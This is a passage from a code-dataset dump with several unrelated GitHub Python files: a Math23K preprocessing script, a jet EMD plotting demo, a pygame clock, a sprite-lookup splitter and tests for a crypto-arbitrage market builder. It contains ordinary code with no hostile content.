train_classifier = data.TabularDataset(path='./train.tsv', format='tsv', fields=fields)\n LABEL.build_vocab(train)\n #print(LABEL.vocab.itos)\n\n\n\n # PREPROCESS DATA\n print('Preprocessing...')\n for d in jsondata:\n #print(d['segmented_text'])\n #print(d['equation'])\n d['segmented_text'], d['equation'] = preprocess(d['segmented_text'], d['equation'], model, fields)\n print('Preprocessing Complete...')\n\n with open('./Math23K-preprocessed.json', 'w') as outfile:\n json.dump(jsondata, outfile)\n #jsondata = json.loads(open('./Math23K-preprocessed.json').read())\n\n # 5 FOLD CROSS VALIDATION\n print('Using existing cross validation splits')\n #print('Preforming cross validation splits...')\n #crossValidation(jsondata, k = 5, k_test=5)\n\n # SAVE SPLIT INDICES\n split('./Math23K-train.txt', './Math23K-dev.txt', './Math23K-test.txt', k_test=5)\n\n # SAVE SRC/TGT files\n train_indices = np.genfromtxt('./Math23K-train.txt').astype(int)\n dev_indices = np.genfromtxt('./Math23K-dev.txt').astype(int)\n 
test_indices = np.genfromtxt('./Math23K-test.txt').astype(int)\n json2txt(train_indices, jsondata, './src-train.txt', './tgt-train.txt')\n json2txt(dev_indices, jsondata, './src-val.txt', './tgt-val.txt')\n json2txt(test_indices, jsondata, './src-test.txt', './tgt-test.txt')\n\n # REMOVE TEST FOLD BEFORE COUNTING UNCOMMON EQUATIONS\n jsondata = [d for d in jsondata if int(d['id']) not in test_indices]\n\n # REMOVE UNCOMMON EQUATIONS\n print('Removing uncommon equations...')\n print('Started with', len(jsondata), 'examples')\n common_data2, uncommon_data2 = mostCommon(jsondata, .2)\n common_data4, uncommon_data4 = mostCommon(jsondata, .4)\n common_data6, uncommon_data6 = mostCommon(jsondata, .6)\n common_data8, uncommon_data8 = mostCommon(jsondata, .8)\n #print('Filtered down to', len(common_data), 'examples')\n\n # SAVE SRC/TGT FILES (FILTERED DATA)\n train_dev_indices = np.append(train_indices, dev_indices)\n json2txt(train_dev_indices, common_data2, './src-train_dev_0.2_common.txt', './tgt-train_dev_0.2_common.txt')\n json2txt(train_dev_indices, uncommon_data2, './src-train_dev_0.2_uncommon.txt', './tgt-train_dev_0.2_uncommon.txt')\n\n json2txt(train_dev_indices, common_data4, './src-train_dev_0.4_common.txt', './tgt-train_dev_0.4_common.txt')\n json2txt(train_dev_indices, uncommon_data4, './src-train_dev_0.4_uncommon.txt', './tgt-train_dev_0.4_uncommon.txt')\n\n json2txt(train_dev_indices, common_data6, './src-train_dev_0.6_common.txt', './tgt-train_dev_0.6_common.txt')\n json2txt(train_dev_indices, uncommon_data6, './src-train_dev_0.6_uncommon.txt', './tgt-train_dev_0.6_uncommon.txt')\n\n json2txt(train_dev_indices, common_data8, './src-train_dev_0.8_common.txt', './tgt-train_dev_0.8_common.txt')\n json2txt(train_dev_indices, uncommon_data8, './src-train_dev_0.8_uncommon.txt', './tgt-train_dev_0.8_uncommon.txt')\n\n # SAVE TSV FILES\n txt2tsv('./src-train.txt', './tgt-train.txt', './train.tsv')\n txt2tsv('./src-val.txt', './tgt-val.txt', './val.tsv')\n txt2tsv('./src-test.txt', './tgt-test.txt', './test.tsv')\n txt2tsv('./src-train_dev_0.2_common.txt', './tgt-train_dev_0.2_common.txt', './train_dev_0.2_common.tsv')\n txt2tsv('./src-train_dev_0.2_uncommon.txt', './tgt-train_dev_0.2_uncommon.txt', './train_dev_0.2_uncommon.tsv')\n txt2tsv('./src-train_dev_0.4_common.txt', './tgt-train_dev_0.4_common.txt', './train_dev_0.4_common.tsv')\n txt2tsv('./src-train_dev_0.4_uncommon.txt', './tgt-train_dev_0.4_uncommon.txt', './train_dev_0.4_uncommon.tsv')\n txt2tsv('./src-train_dev_0.6_common.txt', './tgt-train_dev_0.6_common.txt', './train_dev_0.6_common.tsv')\n txt2tsv('./src-train_dev_0.6_uncommon.txt', './tgt-train_dev_0.6_uncommon.txt', './train_dev_0.6_uncommon.tsv')\n txt2tsv('./src-train_dev_0.8_common.txt', './tgt-train_dev_0.8_common.txt', './train_dev_0.8_common.tsv')\n txt2tsv('./src-train_dev_0.8_uncommon.txt', './tgt-train_dev_0.8_uncommon.txt', './train_dev_0.8_uncommon.tsv')\n\n # SAVE FULL TSV FILES\n tsvs2tsv('./train_dev_0.2_common.tsv', './train_dev_0.2_uncommon.tsv', './train_dev_0.2.tsv')\n tsvs2tsv('./train_dev_0.4_common.tsv', './train_dev_0.4_uncommon.tsv', './train_dev_0.4.tsv')\n tsvs2tsv('./train_dev_0.6_common.tsv', './train_dev_0.6_uncommon.tsv', './train_dev_0.6.tsv')\n tsvs2tsv('./train_dev_0.8_common.tsv', './train_dev_0.8_uncommon.tsv', './train_dev_0.8.tsv')\n\n # SAVE FULL TXT FILES FOR SEQ2SEQ\n tsvs2txt('./train_dev_0.2_common.tsv', './train_dev_0.2_uncommon.tsv', './src-train_dev_0.2.txt', './tgt-train_dev_0.2.txt')\n tsvs2txt('./train_dev_0.4_common.tsv', 
'./train_dev_0.4_uncommon.tsv', './src-train_dev_0.4.txt', './tgt-train_dev_0.4.txt')\n tsvs2txt('./train_dev_0.6_common.tsv', './train_dev_0.6_uncommon.tsv', './src-train_dev_0.6.txt', './tgt-train_dev_0.6.txt')\n tsvs2txt('./train_dev_0.8_common.tsv', './train_dev_0.8_uncommon.tsv', './src-train_dev_0.8.txt', './tgt-train_dev_0.8.txt')\n\n # SPLIT TRAIN DEV FOR CLASSIFIER\n splitTrainDev('./train_dev_0.2.tsv', './train_0.2.tsv', './dev_0.2.tsv')\n splitTrainDev('./train_dev_0.4.tsv', './train_0.4.tsv', './dev_0.4.tsv')\n splitTrainDev('./train_dev_0.6.tsv', './train_0.6.tsv', './dev_0.6.tsv')\n splitTrainDev('./train_dev_0.8.tsv', './train_0.8.tsv', './dev_0.8.tsv')\n\n # SPLIT TRAIN DEV FOR SEQ2SEQ\n splitTrainDev('./src-train_dev_0.2.txt', './src-train_0.2.txt', './src-dev_0.2.txt')\n splitTrainDev('./tgt-train_dev_0.2.txt', './tgt-train_0.2.txt', './tgt-dev_0.2.txt')\n splitTrainDev('./src-train_dev_0.4.txt', './src-train_0.4.txt', './src-dev_0.4.txt')\n splitTrainDev('./tgt-train_dev_0.4.txt', './tgt-train_0.4.txt', './tgt-dev_0.4.txt')\n splitTrainDev('./src-train_dev_0.6.txt', './src-train_0.6.txt', './src-dev_0.6.txt')\n splitTrainDev('./tgt-train_dev_0.6.txt', './tgt-train_0.6.txt', './tgt-dev_0.6.txt')\n splitTrainDev('./src-train_dev_0.8.txt', './src-train_0.8.txt', './src-dev_0.8.txt')\n splitTrainDev('./tgt-train_dev_0.8.txt', './tgt-train_0.8.txt', './tgt-dev_0.8.txt')\n\ndef crossValidation(data, k = 5, k_test=5):\n # Saves k folds\n # k: k fold cross validation\n # k_test: fold to use for test\n\n random.shuffle(data)\n fold_size = math.floor(np.shape(data)[0] / k)\n for i in range(1, k + 1):\n output = open('fold' + str(i) + '.txt', 'w')\n for d in data[(i-1) * fold_size: i * fold_size]:\n output.write(d['id'] + '\\n')\n output.close()\n print('fold' + str(i) + '.txt' + ' saved')\n\ndef split(train_path, dev_path, test_path, k_test=5):\n train_dev = []\n for i in range(1,6):\n if not i == k_test:\n train_dev = np.append(train_dev, open('fold' + str(i) + '.txt').readlines())\n #random.shuffle(train_dev)\n test = open('fold' + str(k_test) + '.txt').readlines()\n\n # Train\n output = open(train_path, 'w')\n for d in train_dev[0:-1000]:\n output.write(d)\n output.close()\n print(train_path + ' saved')\n\n # Dev\n output = open(dev_path, 'w')\n for d in train_dev[-1000:]:\n output.write(d)\n output.close()\n print(dev_path + ' saved')\n\n # Test\n output = open(test_path, 'w')\n for d in test:\n output.write(d)\n output.close()\n print(test_path + ' saved')\n\ndef mostCommon(data, percent):\n # returns PERCENT of data by # of equation occurrences\n\n equation, count= np.unique([d['equation'] for d in data], return_counts=True)\n indices = np.asarray((equation, count)).T[:,1].astype(int).argsort()\n result = np.asarray([[equation[i], count[i]] for i in indices])\n removed = np.array([])\n\n total_eqs = np.sum(np.asarray(result[:,1]).astype(int))\n occurences = 1\n while len(removed) < total_eqs * (1 - percent):\n print('Removing equations with', occurences, 'occurrences...')\n equations_to_remove = result[:,0][np.asarray(result[:,1]).astype(int) == occurences]\n for eq in equations_to_remove:\n eq = eq.strip()\n removed = np.append(removed, [d for d in data if d['equation'].strip() == eq])\n data = [d for d in data if not d['equation'].strip() == eq]\n\n print('total # equations removed:', len(removed))\n occurences += 1\n return data, removed\n\ndef tsvs2tsv(common_path, uncommon_path, output_path):\n \"\"\"\n takes tsv for both common and uncommon data\n writes a combined tsv 
with uncommon tgt replaced with 'seq'\n \"\"\"\n common = open(common_path).readlines()\n uncommon = open(uncommon_path).readlines()\n output = open(output_path, 'w')\n for d in uncommon:\n result = d.split('\\t')\n result[1] = 'seq\\n'\n output.write('\\t'.join(result))\n for d in common:\n output.write(d)\n output.close()\n\ndef tsvs2txt(common_path, uncommon_path, output_path_src, output_path_tgt):\n \"\"\"\n takes tsv for both common and uncommon data\n writes combined txts with uncommon tgt replaced with 'seq'\n \"\"\"\n common = open(common_path).readlines()\n uncommon = open(uncommon_path).readlines()\n output_src = open(output_path_src, 'w')\n output_tgt = open(output_path_tgt, 'w')\n for d in uncommon:\n result = d.split('\\t')\n result[0] = result[0].strip() + '\\n'\n result[1] = 'seq\\n'\n output_src.write(result[0])\n output_tgt.write(result[1])\n for d in common:\n result = d.split('\\t')\n result[0] = result[0].strip() + '\\n'\n result[1] = result[1].strip() + '\\n'\n output_src.write(result[0])\n output_tgt.write(result[1])\n output_src.close()\n output_tgt.close()\n\ndef splitTrainDev(train_dev_path, output_train_path, output_dev_path):\n train_dev = open(train_dev_path).readlines()\n random.shuffle(train_dev)\n output_train = open(output_train_path, 'w')\n output_dev = open(output_dev_path, 'w')\n for d in train_dev[:1000]:\n output_dev.write(d)\n for d in train_dev[1000:]:\n output_train.write(d)\n output_train.close()\n output_dev.close()\n\ndef preprocess(question, equation, model, fields):\n #handle fractions and % and numbers with units\n question = question.replace('%', ' % ')\n\n fractions = re.findall('\\(\\d+\\)/\\(\\d+\\)', question)\n fractions = np.append(fractions, re.findall('\\(\\d+/\\d+\\)', question))\n for i,fraction in enumerate(fractions):\n question = question.replace(fraction, str(sys.maxsize - i))\n equation = equation.replace(fraction, str(sys.maxsize - i))\n\n equation = equation.replace('+', ' + ')\n equation = equation.replace('-', ' - ')\n equation = equation.replace('*', ' * ')\n equation = equation.replace('/', ' / ')\n equation = equation.replace('(', ' ( ')\n equation = equation.replace(')', ' ) ')\n equation = equation.replace('=', ' = ')\n equation = equation.replace('^', ' ^ ')\n equation = equation.replace('%', ' / 100 ')\n equation = equation.split()\n\n question = re.sub(r'(\\d+)([A-z]{1,2})', r'\\1 \\2', question)\n\n # Preprocess Question\n\n question = question.split()\n\n i = 0\n\n question = ['null', 'null', 'null'] + question + ['null', 'null', 'null']\n question_copy = [t for t in question]\n\n for j,token in enumerate(question):\n if isFloat(token):\n example = question_copy[j-3:j+4]\n ex = data.Example.fromlist([' '.join(example), ''], fields)\n dataset = data.Dataset([ex], fields)\n inp = None\n iterator = data.Iterator(dataset, batch_size=1)\n iterator.repeat=False\n for batch in iterator:\n inp = batch.text.t()\n if isSignificant(inp, model):\n for symbol in equation:\n if symbol == token:\n equation[equation.index(symbol)] = '[' + chr(97 + i) + ']'\n for q in question:\n if q == token:\n question[question.index(q)] = '[' + chr(97 + i) + ']'\n i += 1\n\n question = question[3:-3]\n\n question = ' '.join(question) + '\\n'\n equation = ' '.join(equation) + '\\n'\n #print(question)\n #print(equation)\n return question, equation\n\ndef json2txt(json_indices, data, output_path_src, output_path_tgt):\n output_src = open(output_path_src, 'w')\n output_tgt = open(output_path_tgt, 'w')\n for d in data:\n if int(d['id']) in 
json_indices:\n question, equation = d['segmented_text'], d['equation'] #No preprocessing needed here\n output_src.write(question)\n output_tgt.write(equation)\n output_src.close()\n output_tgt.close()\n\ndef isFloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\ndef isSignificant(inp, model):\n #print('inp:', inp)\n #print('evalTest.fast_test(inp, model).data[0]', evalTest.fast_test(inp, model).data[0])\n return(evalTest.fast_test(inp, model).data[0] == 1)\n\ndef txt2tsv(src_path, tgt_path, tsv_path):\n src_txt = open(src_path).readlines()\n tgt_txt = open(tgt_path).readlines()\n tsv = open(tsv_path, 'w')\n for i in range(len(src_txt)):\n tsv.write(src_txt[i].strip() + '\\t' + tgt_txt[i].strip() +'\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"rikkarikka/nn_math_solver","sub_path":"tencent/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":14177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12814330238","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\nimport energyflow as ef\nfrom get_jets import get_jets_from_training_data\n\nplt.rcParams['figure.figsize'] = (4,4)\nplt.rcParams['figure.dpi'] = 120\nplt.rcParams['font.family'] = 'serif'\n\n\ndef get_data_from_file():\n NUMBER_OF_EVENTS = 10\n\n signal_events, background_events, events_combined = get_jets_from_training_data(NUMBER_OF_EVENTS)\n\n events_data = []\n for i in range(np.shape(events_combined)[1]):\n # Take only signal events\n event_column = events_combined[i]\n if int(event_column[2100]) == 0:#1:\n event_data = []\n for j in range(700):\n if event_column[j * 3] > 0:\n pt = event_column[j * 3]\n eta = event_column[j * 3 + 1]\n phi = event_column[j * 3 + 2]\n\n event_data += [[pt, eta, phi]]\n events_data += [event_data]\n return events_data\n\n\ndef get_data_from_web():\n # load quark and gluon jets\n X, y = ef.qg_jets.load(2000, pad=False)\n\n num = 750\n\n # the jet radius for these jets\n R = 0.4\n\n # process jets\n Gs, Qs = [], []\n for arr, events in [(Gs, X[y == 0]), (Qs, X[y == 1])]:\n for i, x in enumerate(events):\n if i >= num:\n break\n\n # ignore padded particles and removed particle id information\n x = x[x[:, 0] > 0, :3]\n\n # center jet according to pt-centroid\n yphi_avg = np.average(x[:, 1:3], weights=x[:, 0], axis=0)\n x[:, 1:3] -= yphi_avg\n\n # mask out any particles farther than R=0.4 away from center (rare)\n x = x[np.linalg.norm(x[:, 1:3], axis=1) <= R]\n\n # add to list\n arr.append(x)\n return Gs,Qs\n # choose interesting events\n # ev0, ev1 = Gs[0], Gs[15]\n\n\ndef plot_emd(ev0, ev1):\n # calculate the EMD and the optimal transport flow\n R = 0.4\n emdval, G = ef.emd.emd(ev0, ev1, R=R, return_flow=True)\n if not (10 < emdval < 5000):\n return\n\n print('Made It Here!')\n # plot the two events\n colors = ['red', 'blue']\n labels = ['Gluon Jet 1', 'Gluon Jet 2']\n for i, ev in enumerate([ev0, ev1]):\n pts, ys, phis = ev[:, 0], ev[:, 1], ev[:, 2]\n plt.scatter(ys, phis, marker='o', s=2 * pts, color=colors[i], lw=0, zorder=10, label=labels[i])\n\n # plot the flow\n mx = G.max()\n xs, xt = ev0[:, 1:3], ev1[:, 1:3]\n for i in range(xs.shape[0]):\n for j in range(xt.shape[0]):\n if G[i, j] > 0:\n plt.plot([xs[i, 0], xt[j, 0]], [xs[i, 1], xt[j, 1]],\n alpha=G[i, j] / mx, lw=1.25, color='black')\n\n # plot settings\n #plt.xlim(-R, R)\n #plt.ylim(-R, R)\n plt.xlabel('Rapidity')\n plt.ylabel('Azimuthal Angle')\n # 
plt.xticks(np.linspace(-R, R, 5))\n # plt.yticks(np.linspace(-R, R, 5))\n\n plt.text(0.6, 0.03, 'EMD: {:.1f} GeV'.format(emdval), fontsize=10, transform=plt.gca().transAxes)\n plt.legend(loc=(0.1, 1.0), frameon=False, ncol=2, handletextpad=0)\n\n plt.show()\n \"\"\"\n # compute pairwise EMDs between all jets (takes about 3 minutes, can change n_jobs if you have more cores)\n g_emds = ef.emd.emds(Gs, R=R, norm=True, verbose=1, n_jobs=1, print_every=25000)\n q_emds = ef.emd.emds(Qs, R=R, norm=True, verbose=1, n_jobs=1, print_every=25000)\n\n # prepare for histograms\n bins = 10**np.linspace(-2, 0, 60)\n reg = 10**-30\n midbins = (bins[:-1] + bins[1:])/2\n dmidbins = np.log(midbins[1:]) - np.log(midbins[:-1]) + reg\n midbins2 = (midbins[:-1] + midbins[1:])/2\n\n # compute the correlation dimensions\n dims = []\n for emd_vals in [q_emds, g_emds]:\n uemds = np.triu(emd_vals)\n counts = np.cumsum(np.histogram(uemds[uemds > 0], bins=bins)[0])\n dims.append((np.log(counts[1:] + reg) - np.log(counts[:-1] + reg))/dmidbins)\n\n # plot the correlation dimensions\n plt.plot(midbins2, dims[0], '-', color='blue', label='Quarks')\n plt.plot(midbins2, dims[1], '-', color='red', label='Gluons')\n\n # labels\n plt.legend(loc='center right', frameon=False)\n\n # plot style\n plt.xscale('log')\n plt.xlabel('Energy Scale Q/pT'); plt.ylabel('Correlation Dimension')\n plt.xlim(0.02, 1); plt.ylim(0, 5)\n\n plt.show()\n \"\"\"\n\n\nevents_dat = get_data_from_file()\nprint('Found %d signal events' % len(events_dat))\nfor pair in itertools.product(events_dat, repeat=2):\n (ev0, ev1) = pair\n plot_emd(np.array(ev0), np.array(ev1))\n","repo_name":"rotemov/ML4Jets-HUJI","sub_path":"emdemo.py","file_name":"emdemo.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"9297986517","text":"import pygame\nimport datetime\nimport math \n\npygame.init()\n\nW, H = 800, 800\nx = W//2\ny = H//2\n\nWHITE = (255, 255, 255)\n\nsc = pygame.display.set_mode((W, H))\nsc.fill(WHITE)\n\nmickey = pygame.image.load(\"mickey_clock.png\")\nleftHand = pygame.image.load(\"left_hand.png\")\nrightHand = pygame.image.load(\"right_hand.png\")\nminute_hand_length = 140\nhand_thickness = 10\nmickeyRect = mickey.get_rect()\n\n\ndef deg_to_rad(deg):\n return deg * math.pi / 180.0\n\ndef blitRotateCenter(surf, image, center, angle):\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(center = image.get_rect(center = center).center)\n surf.blit(rotated_image, new_rect)\n\ndef rotate_point(point, pivot, angle):\n \n x = point[0] - pivot[0]\n y = point[1] - pivot[1]\n\n x_new = x * math.cos(angle) - y * math.sin(angle)\n y_new = x * math.sin(angle) + y * math.cos(angle)\n\n x_new += pivot[0]\n y_new += pivot[1]\n\n return int(x_new), int(y_new)\n \nlangle = 0\nrangle = 0\n\n\nwhile True:\n \n sc.fill((WHITE))\n \n current_time = datetime.datetime.now()\n \n langle = current_time.second*6 - 90\n rangle = (current_time.minute*6) - 90\n \n sc.blit(mickey, (x, y))\n sc.blit(mickey, mickeyRect)\n \n blitRotateCenter(sc, leftHand, (x,y), -langle)\n # minute_hand_end = rotate_point((x, y - minute_hand_length), mickeyRect, -rangle)\n blitRotateCenter(sc, rightHand, (x,y), -rangle)\n # pygame.draw.line(sc, (255, 0, 0), (x,y), minute_hand_end, hand_thickness)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n\n 
pygame.display.update()","repo_name":"DayFay1/KBTU","sub_path":"TSISVII/сщзнцфвфцв.py","file_name":"сщзнцфвфцв.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17032780281","text":"import glob\nimport json\nimport re\nimport logging\n\nfrom layout.empty_layout_registry import EmptyLayoutRegistry\nfrom schema.bitmap_image import BitmapImage\nfrom schema.layout_offset_lookup_function import LayoutOffsetLookupFn\nfrom schema.layout_summary import LayoutSummary\nfrom schema.piece import Piece\nfrom schema.place import Place\nfrom schema.sprite import Sprite\nfrom schema.sprite_offset import SpriteOffset\n\n\nclass PreComputedLookupSplitter:\n def __init__(self, dir_name, place_ids,\n layout_registry=EmptyLayoutRegistry(),\n has_background=False):\n self.has_background = has_background\n self.dir_name = dir_name\n self.place_ids = place_ids\n self.layout_registry = layout_registry\n\n logging.info(\"loaded {} ids from {}\".format(len(self.place_ids),\n dir_name))\n\n @classmethod\n def from_dir(cls, dir_name, layout_registry, has_background=False):\n place_ids = list(cls.place_ids_in_dir(dir_name))\n return PreComputedLookupSplitter(dir_name=dir_name,\n place_ids=place_ids,\n layout_registry=layout_registry,\n has_background=has_background)\n\n @classmethod\n def save_to_dir(cls, place, dir_name):\n collapsed = [\n {\n \"id\": cls.index_from_global_id(piece.id),\n \"x\": piece.bitmap_image.x,\n \"y\": piece.bitmap_image.y,\n \"width\": piece.bitmap_image.width,\n \"height\": piece.bitmap_image.height,\n \"sprite\": {\n \"x\": piece.bitmap_image.sprite_offset.x,\n \"y\": piece.bitmap_image.sprite_offset.y\n }\n }\n for piece in place.pieces]\n\n image_file_name = \"{}/{}.label_sprites.png\".format(dir_name, place.id)\n place.sprite.save_to_filename(image_file_name)\n logging.info(\"saved image to {}\".format(image_file_name))\n\n json_file_name = \"{}/{}.labels.json\".format(dir_name, place.id)\n with open(json_file_name, 'w') as out:\n json.dump(collapsed, out, indent=True, sort_keys=True)\n logging.info(\n \"saved {} pieces to {}\".format(len(collapsed), json_file_name))\n\n def split(self, place_id):\n if place_id in self.place_ids:\n sprite = self.load_sprite_from_file(place_id)\n pieces = list()\n pieces_from_file = self.load_pieces_from_file(place_id)\n logging.info(\"loaded {} pieces from file\".format(len(pieces_from_file)))\n for entry in pieces_from_file:\n piece_id = self.make_global_id(place_id, entry['id'])\n\n layout_offset_lookup = \\\n LayoutOffsetLookupFn(self.layout_registry,\n place_id,\n piece_id)\n\n piece = Piece(id=piece_id,\n bitmap_image=BitmapImage(\n x=entry['x'],\n y=entry['y'],\n width=entry['width'],\n height=entry['height'],\n sprite_offset=self.read_sprite_offset(\n entry),\n layout_offset_lookup=layout_offset_lookup))\n pieces.append(piece)\n\n pieces_filtered = self.filter_out_background(pieces)\n logging.info(\n \"{} pieces left after background filtering\"\n .format(len(pieces_filtered)))\n\n return Place(id=place_id,\n sprite=sprite,\n pieces=pieces_filtered)\n else:\n None\n\n def make_global_id(self, place_id, index):\n return \"{}_{}\".format(place_id, index)\n\n @classmethod\n def index_from_global_id(cls, global_id):\n match = re.search(r'.+_(\\d+)$', global_id)\n return match.group(1)\n\n def load_pieces_from_file(self, place_id):\n with open(\"{}/{}.labels.json\".format(self.dir_name, place_id)) as file:\n return json.load(file)\n\n def 
load_sprite_from_file(self, place_id):\n filename = \"{}/{}.label_sprites.png\".format(self.dir_name, place_id)\n return Sprite.from_filename(filename)\n\n @staticmethod\n def read_sprite_offset(entry):\n if \"sprite\" in entry:\n return SpriteOffset(\n x=entry['sprite']['x'],\n y=entry['sprite']['y']\n )\n else:\n return SpriteOffset(\n x=entry['sprite_offset'],\n y=0\n )\n\n @classmethod\n def place_ids_in_dir(cls, dir_name):\n for file in glob.glob(\"{}/*.labels.json\".format(dir_name)):\n match = re.search(\"{}/(.+).labels.json\".format(dir_name), file)\n if match:\n yield match.group(1)\n\n def filter_out_background(self, pieces):\n def is_background(piece):\n bitmap_image = piece.bitmap_image\n sprite_offset = bitmap_image.sprite_offset\n return bitmap_image.x == 0 and sprite_offset.x == 0\n\n if self.has_background:\n return list(filter(lambda p: not is_background(p), pieces))\n else:\n return pieces\n","repo_name":"mikemoraned/biscuits","sub_path":"speculaas/pieces-finder/precomputed_lookup_splitter.py","file_name":"precomputed_lookup_splitter.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"7083648502","text":"from unittest import TestCase\nfrom peregrinearb.async_build_markets import build_collections, build_specific_collections, SymbolCollectionBuilder\nimport ccxt.async_support as ccxt\nimport asyncio\nfrom peregrinearb.multi_graph_builder import build_arbitrage_graph_for_exchanges\n\n\nclass TestCollectionBuilders(TestCase):\n\n def test_errors_raised(self):\n with self.assertRaises(ValueError):\n # note the misspelling of \"countries\" as \"contries\"\n build_specific_collections(contries=['US'])\n\n def test_whitelist_blacklist(self):\n us_exchanges = asyncio.get_event_loop().run_until_complete(build_specific_collections(countries=['US']))\n confirmed_us_exchanges = []\n for exchange_list in us_exchanges.values():\n for exchange_name in exchange_list:\n # so each exchange is only checked once.\n if exchange_name in confirmed_us_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertIn('US', exchange.countries)\n confirmed_us_exchanges.append(exchange_name)\n\n not_us_exchanges = asyncio.get_event_loop().run_until_complete(\n build_specific_collections(countries=['US'], blacklist=True)\n )\n confirmed_not_us_exchanges = []\n for exchange_list in not_us_exchanges.values():\n for exchange_name in exchange_list:\n # so each exchange is only checked once.\n if exchange_name in confirmed_not_us_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertNotIn('US', exchange.countries)\n confirmed_not_us_exchanges.append(exchange_name)\n\n def test_kwargs_with_dict_as_rule(self):\n specific_collections = asyncio.get_event_loop().run_until_complete(\n build_specific_collections(has={'fetchOrderBook': True, 'createOrder': True})\n )\n # exchanges which are confirmed to meet the given criteria (.hasFetchOrderBook and .hasCreateOrder)\n confirmed_exchanges = []\n for exchange_list in specific_collections.values():\n for exchange_name in exchange_list:\n if exchange_name in confirmed_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertTrue(exchange.hasFetchOrderBook and exchange.hasCreateOrder)\n confirmed_exchanges.append(exchange_name)\n\n def test_build_collections(self):\n collections = asyncio.get_event_loop().run_until_complete(build_collections(write=False))\n confirmed_exchanges = []\n for exchange_list in 
collections.values():\n for exchange_name in exchange_list:\n if exchange_name in confirmed_exchanges:\n continue\n exchange = getattr(ccxt, exchange_name)()\n self.assertTrue(exchange.has['fetchOrderBook'])\n confirmed_exchanges.append(exchange_name)\n\n\nclass TestExchangeGraphBuilder(TestCase):\n\n def test_all_node_degrees_greater_than_one(self):\n exchanges = ['bittrex', 'bitstamp', 'poloniex']\n graph = asyncio.get_event_loop().run_until_complete(build_arbitrage_graph_for_exchanges(exchanges))\n for node in graph:\n self.assertGreater(graph.degree(node), 1)\n\n def test_market_names_of_edges_are_valid(self):\n exchange_names = ['bittrex', 'bitstamp', 'poloniex']\n graph = asyncio.get_event_loop().run_until_complete(build_arbitrage_graph_for_exchanges(exchange_names))\n\n # load the exchanges with their markets\n exchanges = {exchange_name: getattr(ccxt, exchange_name)() for exchange_name in exchange_names}\n futures = [asyncio.ensure_future(exchange.load_markets()) for exchange in exchanges.values()]\n asyncio.get_event_loop().run_until_complete(asyncio.gather(*futures))\n\n for edge in graph.edges(data=True):\n data = edge[2]\n exchange = exchanges[data['exchange_name']]\n self.assertIn(data['market_name'], exchange.symbols)\n\n\nclass TestExchange(ccxt.Exchange):\n\n def __init__(self, name='', markets=None):\n super().__init__()\n if markets is None:\n markets = {}\n self.markets = markets\n self.id = name\n\n @property\n def symbols(self):\n return self.markets.keys()\n\n @property\n def currencies(self):\n result = set()\n for market in self.markets:\n try:\n base, quote = market.split('/')\n except ValueError:\n continue\n result.add(base)\n result.add(quote)\n return result\n\n async def load_markets(self, reload=False):\n pass\n\n\nclass SymbolCollectionBuilderTestCase(TestCase):\n\n def test_add_exchange_to_symbol(self):\n exchange_a = TestExchange(name='a', )\n exchange_b = TestExchange(name='b', )\n\n builder = SymbolCollectionBuilder([exchange_a, exchange_b], )\n self.assertEqual(builder.collections, {})\n builder._add_exchange_to_symbol('A/B', 'a')\n self.assertEqual(builder.collections, {'A/B': ['a']})\n builder._add_exchange_to_symbol('A/B', 'a')\n self.assertEqual(builder.collections, {'A/B': ['a']})\n\n builder._add_exchange_to_symbol('A/B', 'b')\n self.assertEqual(builder.collections, {'A/B': ['a', 'b']})\n\n builder._add_exchange_to_symbol('B/C', 'b')\n self.assertEqual(builder.collections, {'A/B': ['a', 'b'], 'B/C': ['b']})\n\n asyncio.get_event_loop().run_until_complete(exchange_a.close())\n asyncio.get_event_loop().run_until_complete(exchange_b.close())\n\n def test_add_exchange_to_collections(self):\n exchange_a = TestExchange(name='a', markets={sym: {} for sym in ['A/B', 'A/C', 'B/C', 'E/C']})\n exchange_b = TestExchange(name='b', markets={sym: {} for sym in ['A/B', 'D/C', 'B/C', 'E/A', 'A/X']})\n\n builder = SymbolCollectionBuilder([exchange_a, exchange_b],\n symbols=['D/C'],\n exclusive_currencies=['B', 'X', 'C'],\n inclusive_currencies=['D'], )\n\n result = asyncio.get_event_loop().run_until_complete(builder.build_collections(write=False, ))\n print(result)\n self.assertEqual(result, {'B/C': ['a', 'b'], 'D/C': ['b']})\n","repo_name":"wardbradt/peregrine","sub_path":"peregrinearb/tests/test_build_markets.py","file_name":"test_build_markets.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":1139,"dataset":"github-code","pt":"6"} +{"seq_id":"30486193781","text":"import numpy as np\nimport cffi\nimport 
